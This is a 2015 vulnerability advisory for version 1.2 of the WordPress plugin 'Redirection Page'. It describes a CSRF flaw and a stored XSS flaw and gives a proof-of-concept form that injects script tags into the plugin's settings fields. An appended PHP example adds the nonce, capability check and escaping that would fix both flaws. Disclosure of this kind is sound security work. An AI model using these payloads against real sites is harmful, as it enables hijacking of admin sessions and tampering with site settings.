WordPress Redirection Page 1.2 CSRF / XSS
Posted on 10 February 2015
Title: WordPress 'Redirection Page' CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015-01-26
Download: https://wordpress.org/plugins/redirection-page/
Contacted WordPress: 2015-01-26

==========================================================
## Plugin description:
==========================================================

Redirect your specified pages, it is useful when you have 404/not-found pages. Go to Settings Page to start redirection.

==========================================================
## CSRF:
==========================================================

It is possible to change the plugin's redirect settings by tricking a logged-in admin into visiting a crafted page.

==========================================================
## Stored XSS:
==========================================================

Redirect settings from the admin page are stored and shown unsanitized on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.

PoC: Log in as admin and submit this form:

    <form method="POST" action="http://[TARGET]/wp-admin/options-general.php?page=redirection-page&redirectionpage_action=add">
    <input type="text" name="source" value=""><script>alert(1);</script>"><br />
    <input type="text" name="redir" value=""><script>alert(2);</script>"><br />
    <input type="submit">
    </form>

==========================================================
## Solution
==========================================================

No fix available.
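Since the advisory reports no fix, the following is an added illustration (not the plugin's own code) of how a WordPress settings handler for this "add redirect" action would close both issues: a nonce plus capability check defeats the CSRF, and sanitising on input and escaping on output removes the stored XSS. The function names, the `rp_redirects` option key and the nonce action string are assumptions; the WordPress API calls are real.

```php
<?php
// Hypothetical hardened handler for the "add redirect" action (not the
// plugin's own code). Function names and the option key are assumptions.

define( 'RP_NONCE_ACTION', 'rp_add_redirect' );

// Runs on the settings page load and processes the POSTed form.
function rp_handle_add() {
    if ( ! isset( $_GET['redirectionpage_action'] ) || $_GET['redirectionpage_action'] !== 'add' ) {
        return;
    }
    // Capability check: only users allowed to manage options may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF mitigation: the request must carry a valid nonce bound to this action.
    // A form hosted on another site cannot know the nonce, so check_admin_referer() dies.
    check_admin_referer( RP_NONCE_ACTION );

    // Input sanitisation: strip tags from the source, keep only a URL shape for the target.
    $source = sanitize_text_field( wp_unslash( $_POST['source'] ?? '' ) );
    $redir  = esc_url_raw( wp_unslash( $_POST['redir'] ?? '' ) );
    if ( $source === '' || $redir === '' ) {
        return;
    }
    $redirects            = (array) get_option( 'rp_redirects', array() );
    $redirects[ $source ] = $redir;
    update_option( 'rp_redirects', $redirects );
}

// Renders the form and the stored entries; every stored value is escaped on output.
function rp_render_settings() {
    $action = add_query_arg(
        array( 'page' => 'redirection-page', 'redirectionpage_action' => 'add' ),
        admin_url( 'options-general.php' )
    );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( RP_NONCE_ACTION ); // emits the hidden _wpnonce field the handler checks
    echo '<input type="text" name="source"><br />';
    echo '<input type="text" name="redir"><br />';
    echo '<input type="submit" value="Add"></form>';

    foreach ( (array) get_option( 'rp_redirects', array() ) as $source => $redir ) {
        // Stored XSS mitigation: esc_html()/esc_url() neutralise a "><script> payload.
        echo '<p>' . esc_html( $source ) . ' &rarr; ' . esc_url( $redir ) . '</p>';
    }
}
```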
